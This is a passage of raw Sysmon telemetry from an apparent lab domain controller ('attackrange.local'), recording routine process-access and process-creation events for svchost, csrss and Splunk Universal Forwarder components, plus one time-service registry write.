10341000x80000000000000009430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9364-6005-D404-00000000A301}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9364-6005-D404-00000000A301}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-9364-6005-D404-00000000A301}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9365-6005-D604-00000000A301}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9365-6005-D604-00000000A301}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9365-6005-D604-00000000A301}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.858{59A5CD1D-9365-6005-D604-00000000A301}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000009462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:56:03.638{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda1-0xa916ffa4) 10341000x80000000000000009465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:17.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:17.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 